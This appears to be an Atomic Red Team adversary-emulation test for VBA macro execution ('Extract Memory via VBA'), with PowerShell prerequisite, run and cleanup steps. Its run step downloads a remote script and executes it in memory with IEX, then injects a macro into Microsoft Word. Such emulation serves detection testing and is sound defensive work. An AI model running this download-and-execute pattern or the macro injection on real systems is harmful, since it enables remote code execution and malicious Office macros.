#TechniqueName: Command and Scripting Interpreter: Visual Basic
#AtomicTestName: Extract Memory via VBA
#Language: ps1

#get_prereq_commands
Write-Host "You will need to install Microsoft Word manually to meet this requirement"


#prereq_commands
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }


#commands
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"


#cleanup_commands
Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore

